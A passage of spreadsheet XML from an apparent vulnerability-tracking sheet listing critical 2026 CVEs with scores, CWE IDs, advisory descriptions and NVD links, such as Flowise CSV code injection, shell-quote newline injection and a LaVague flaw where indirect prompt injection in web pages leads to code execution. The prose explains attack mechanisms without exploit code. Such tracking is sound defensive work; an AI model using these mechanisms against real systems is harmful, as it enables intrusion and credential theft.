        <v>9.199999999999999</v>
      </c>
      <c r="D182" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E182" s="5" t="inlineStr"/>
      <c r="F182" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G182" s="5" t="inlineStr">
        <is>
          <t>node.js, python</t>
        </is>
      </c>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L182" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the CSVAgent in packages/components/nodes/agents/CSVAgent/CSVAgent.ts extracted attacker-controlled CSV data with file.split(',').pop() and interpolated it directly into executable Python as base64_string = "${base64String}" before calling Pyodide. The validatePythonCodeForDataFrame() denylist only checked later LLM-generated code and did not validate this initial code block. An authenticated attacker could inject a closing quote followed by Python code, use Pyodide's js bridge to load Node.js child_process, and execute arbitrary operating system commands as root in the Flowise container. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69255</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72836</t>
        </is>
      </c>
      <c r="C183" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D183" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E183" s="5" t="inlineStr"/>
      <c r="F183" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G183" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L183" s="5" t="inlineStr">
        <is>
          <t>FileBrowser before 2.63.19 does not account for case-insensitive filesystems when checking home directory ownership during self-registration. When Signup and CreateUserDir are enabled and FileBrowser's root is on a case-insensitive filesystem (confirmed on Windows/NTFS), two self-registered usernames that differ only in letter case (e.g., CaseVictim and casevictim) are stored as distinct accounts but resolve to the same physical home directory, because the scope-ownership check compares the persisted scope as an exact case-sensitive string. A second registrant can therefore read, overwrite, and delete another account's files through authenticated HTTP endpoints, without needing an existing account or victim interaction.</t>
        </is>
      </c>
      <c r="M183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72836</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73414</t>
        </is>
      </c>
      <c r="C184" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D184" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E184" s="5" t="inlineStr"/>
      <c r="F184" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G184" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr">
        <is>
          <t>CWE-150, CWE-78</t>
        </is>
      </c>
      <c r="L184" s="5" t="inlineStr">
        <is>
          <t>Shescape is a simple shell escape library for JavaScript. Prior to 2.1.14 and 3.0.1, getEscapeFunction in src/internal/win/cmd.js does not escape `(` and `)` when applications use the escape or escapeAll APIs on Windows with shell set to cmd.exe, or with shell set to true when CMD is the default. An attacker-controlled argument can break out of a parenthesized CMD construct and inject shell syntax depending on the original command, resulting in arbitrary command execution. This issue is fixed in versions 2.1.14 and 3.0.1.</t>
        </is>
      </c>
      <c r="M184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73414</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="C185" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D185" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E185" s="5" t="inlineStr"/>
      <c r="F185" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G185" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L185" s="5" t="inlineStr">
        <is>
          <t>Improper handling of case sensitivity in the configuration validation component of MongoDB Server may cause the authorization subsystem to remain in a default disabled state during server startup. An unauthenticated user with network access to a deployment where this condition occurs can perform arbitrary administrative operations, resulting in full impact of data confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="M185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82090</t>
        </is>
      </c>
      <c r="C186" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D186" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E186" s="5" t="inlineStr"/>
      <c r="F186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G186" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L186" s="5" t="inlineStr">
        <is>
          <t>Pocket through 8.33.0.0 allows XSS because "Save to Pocket" injects external HTML into the DOM.  JavaScript code can alter the application state via native bridge methods.</t>
        </is>
      </c>
      <c r="M186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82090</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84197</t>
        </is>
      </c>
      <c r="C187" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D187" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E187" s="5" t="inlineStr"/>
      <c r="F187" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G187" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297, CWE-300</t>
        </is>
      </c>
      <c r="L187" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ditto's Node.js JavaScript client, all released versions of @eclipse-ditto/ditto-javascript-client-node from 2.0.0 to 3.9.0 and of its predecessor package @eclipse-ditto/ditto-javascript-client-node_1.0 from 1.0.0 to 2.1.0, the WebSocket transport hard-codes rejectUnauthorized: false when creating the underlying ws WebSocket. Certificate chain and hostname validation are therefore disabled for every wss:// connection, and no builder option, constructor argument or environment variable lets an application turn validation back on. An attacker in a position to intercept the connection can present an arbitrary certificate, complete the TLS handshake, read the credentials that the configured authentication provider sends in the Authorization header of the WebSocket upgrade request, and read, alter or inject Ditto Protocol messages for the lifetime of the connection. The Java client, the browser/DOM JavaScript client and the HTTP transport of the Node.js client are not affected.</t>
        </is>
      </c>
      <c r="M187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85625</t>
        </is>
      </c>
      <c r="C188" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D188" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E188" s="5" t="inlineStr"/>
      <c r="F188" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G188" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L188" s="5" t="inlineStr">
        <is>
          <t>sift (sift.js) 17.1.3 enumerates query keys with for...in, which walks the object prototype chain, and dispatches any matched operator key including $where. The $where operation compiles a string value into a function using new Function unless CSP_ENABLED is set (not set by default). As a result, if a prototype-pollution primitive elsewhere in the process sets Object.prototype.$where to a malicious string, even benign filter calls such as sift({}) execute arbitrary JavaScript. Additionally, passing an untrusted query object containing a string $where directly to sift results in code execution under the default configuration.</t>
        </is>
      </c>
      <c r="M188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85625</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85694</t>
        </is>
      </c>
      <c r="C189" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D189" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E189" s="5" t="inlineStr"/>
      <c r="F189" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G189" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L189" s="5" t="inlineStr">
        <is>
          <t>LaVague 0.2.35 contains a remote code execution vulnerability in PythonFromMarkdownExtractor.extract_as_object that evaluates untrusted language model output derived from web page content. Attackers can inject malicious Python code through web pages using indirect prompt injection to execute arbitrary code on the operator's host without review.</t>
        </is>
      </c>
      <c r="M189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85694</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86426</t>
        </is>
      </c>
      <c r="C190" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D190" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E190" s="5" t="inlineStr"/>
      <c r="F190" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G190" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L190" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.8.0 contains an authentication bypass vulnerability in the REST API that allows unauthenticated attackers to access protected endpoints by sending numeric values instead of string tokens. Attackers can exploit MySQL type coercion by sending small integers like 0 through 9 to match token hashes, gaining access to API functionality including device credentials and administrative features that enable remote code execution through alert templates.</t>
        </is>
      </c>
      <c r="M190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86426</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88880</t>
        </is>
      </c>
      <c r="C191" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D191" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E191" s="5" t="inlineStr"/>
      <c r="F191" s="5" t="inlineStr"/>
      <c r="G191" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L191" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.11.3 fails to validate Link header destinations when following GitLab server pagination, allowing malicious servers to redirect credential-bearing requests. Attackers controlling a compromised GitLab server can specify a Link header pointing to attacker-controlled infrastructure to exfiltrate authentication credentials.</t>
        </is>
      </c>
      <c r="M191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88880</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88887</t>
        </is>
      </c>
      <c r="C192" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D192" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E192" s="5" t="inlineStr"/>
      <c r="F192" s="5" t="inlineStr"/>
      <c r="G192" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L192" s="5" t="inlineStr">
        <is>
          <t>Renovate is a dependency update automation tool. When listing tags/digests for a container image, Renovate follows pagination links supplied by the remote registry in the HTTP Link header and attaches the registry credentials to the follow-up request without verifying that the pagination URL has the same origin as the original registry. A malicious or compromised container registry can therefore specify a Link header pointing to an attacker-controlled host and receive the credentials Renovate uses for that registry. Exploitation requires that the target has container (Docker) dependencies and is already interacting with the malicious or compromised registry. This is fixed in Renovate 44.11.2 (npm and renovate/renovate images), Mend Renovate CE/EE 15.4.0 and the mend-renovate-enterprise-edition Helm chart 10.4.0; the same-origin check can be disabled with RENOVATE_X_DOCKER_PAGINATION_ALLOW_CROSS_ORIGIN.</t>
        </is>
      </c>
      <c r="M192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88887</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89243</t>
        </is>
      </c>
      <c r="C193" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D193" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E193" s="5" t="inlineStr"/>
      <c r="F193" s="5" t="inlineStr"/>
      <c r="G193" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L193" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in UserGroups::setGroup_name() that fails to sanitize group_name input. Administrators with canAdminUserGroups permission can inject malicious HTML and JavaScript that executes in the browser when other administrators access the user manager interface.</t>
        </is>
      </c>
      <c r="M193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89243</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9277</t>
        </is>
      </c>
      <c r="C194" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D194" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E194" s="5" t="inlineStr"/>
      <c r="F194" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G194" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L194" s="5" t="inlineStr">
        <is>
          <t>shell-quote's `quote()` function did not validate object-token inputs against the operator model used by `parse()`. The `.op` field was backslash-escaped character by character using `/(.)/g`, which in JavaScript does not match line terminators (\n, \r, U+2028, U+2029). A line terminator in `.op` therefore passed through unescaped into the output; POSIX shells treat a literal newline as a command separator, so any content after it would execute as a second command. The vulnerable code path is reachable in two ways: (1) direct construction of `{ op: '...\n...' }` from external input, and (2) via `parse(cmd, envFn)` when `envFn` returns object tokens whose `.op` is attacker-influenced. Both are documented API surface. Fixed by replacing the per-character escape with strict shape validation: `.op` must match the parser's control-operator allowlist; `{ op: 'glob', pattern }` validates `pattern` and forbids line terminators; `{ comment }` validates `comment` and forbids line terminators; any other object shape throws `TypeError`.</t>
        </is>
      </c>
      <c r="M194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9277</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9317</t>
        </is>
      </c>
      <c r="C195" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D195" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E195" s="5" t="inlineStr"/>
      <c r="F195" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G195" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L195" s="5" t="inlineStr">
        <is>
          <t>Nango before 0.71.6 contains a missing authentication vulnerability in the runner tRPC server that allows unauthenticated attackers to execute arbitrary JavaScript code by invoking the exposed start procedure without credentials. Attackers with network access to the runner port can send requests to the unauthenticated start procedure, bypassing the unenforced RUNNER_SECRET_KEY environment variable, to achieve remote code execution within the runner process.</t>
        </is>
      </c>
      <c r="M195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9317</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10059</t>
        </is>
      </c>
      <c r="C196" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D196" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E196" s="5" t="inlineStr"/>
      <c r="F196" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G196" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L196" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Multicluster Engine for Kubernetes ClusterCurator controller. A tenant administrator with namespace-scoped privileges can exploit this vulnerability by creating a namespaced ClusterCurator. This action inadvertently grants the tenant administrator the ability to mint a token for a ServiceAccount with cluster-wide administrative authority. This leads to a privilege escalation, allowing the tenant administrator to gain full control over the cluster.</t>
        </is>
      </c>
      <c r="M196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10059</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16503</t>
        </is>
      </c>
      <c r="C197" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D197" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E197" s="5" t="inlineStr"/>
      <c r="F197" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G197" s="5" t="inlineStr">
        <is>
          <t>docker, postgresql</t>
        </is>
      </c>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1327, CWE-1393</t>
        </is>
      </c>
      <c r="L197" s="5" t="inlineStr">
        <is>
          <t>Deployment of the VPS.org one-click Supabase template deploys a PostgreSQL instance that is published on all interfaces (0.0.0.0:5432) with a default database password set to "postgres". Because Docker installs its own iptables rules, this exposure bypasses a standard host UFW configuration.</t>
        </is>
      </c>
      <c r="M197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16503</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17057</t>
        </is>
      </c>
      <c r="C198" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D198" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E198" s="5" t="inlineStr"/>
      <c r="F198" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G198" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H198" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I198" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L198" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service and affect data integrity due to missing authentication for critical functions.</t>
        </is>
      </c>
      <c r="M198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17057</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17207</t>
        </is>
      </c>
      <c r="C199" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D199" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E199" s="5" t="inlineStr"/>
      <c r="F199" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G199" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H199" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I199" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L199" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service and compromise integrity due to a buffer overflow.</t>
        </is>
      </c>
      <c r="M199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17207</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19646</t>
        </is>
      </c>
      <c r="C200" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D200" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E200" s="5" t="inlineStr"/>
      <c r="F200" s="5" t="inlineStr"/>
      <c r="G200" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr">
        <is>
          <t>CWE-1149</t>
        </is>
      </c>
      <c r="L200" s="5" t="inlineStr">
        <is>
          <t>IBM Common Licensing Agent 9.0, Agent 9.0.0.1, Agent 9.0.0.2, ART 9.0, ART 9.0.0.1, and ART 9.0.0.2 could allow a remote attacker to redirect users to an arbitrary domain due to improper validation of the HTTP Host header.</t>
        </is>
      </c>
      <c r="M200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19646</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27690</t>
        </is>
      </c>
      <c r="C201" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D201" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E201" s="5" t="inlineStr"/>
      <c r="F201" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G201" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H201" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I201" s="5" t="inlineStr">
        <is>
          <t>2026-07-14</t>
        </is>
      </c>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L201" s="5" t="inlineStr">
        <is>
          <t>Due to an HTTP Request Smuggling vulnerability in SAP Approuter, an unauthenticated attacker could send a specially crafted HTTP request that leads to request-response desynchronization. This could result in the exposure of user responses and cause the system to become unavailable. This leads to a high impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="M201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27690</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27962</t>
        </is>
      </c>
      <c r="C202" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D202" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E202" s="5" t="inlineStr"/>
      <c r="F202" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G202" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H202" s="5" t="inlineStr">
        <is>
          <t>authlib:authlib</t>
        </is>
      </c>
      <c r="I202" s="5" t="inlineStr">
        <is>
          <t>2026-03-16</t>
        </is>
      </c>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr">
        <is>
